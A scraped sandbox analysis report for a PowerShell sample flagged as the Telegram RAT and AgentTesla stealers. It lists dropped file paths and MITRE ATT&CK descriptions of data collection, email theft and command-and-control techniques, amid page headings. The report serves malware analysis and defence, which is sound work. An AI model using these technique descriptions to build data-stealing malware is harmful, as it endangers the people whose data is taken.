Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report o3KyzpE7F4.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_114f36841bde2782ceb5e919255ae3656018f8_00000000_7261f982-655b-4a37-acb2-62dfc002047e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_114f36841bde2782ceb5e919255ae3656018f8_00000000_cfb088d1-9e20-4517-9a57-fc120c8b9284\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC12.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC22.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC62.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC71.tmp.xml

C:\ProgramData\nippleskulcha\thukanthukai.~!!@@!!@@!!~

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\error[1]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\error[1]

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Windows Analysis Report
o3KyzpE7F4.ps1

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre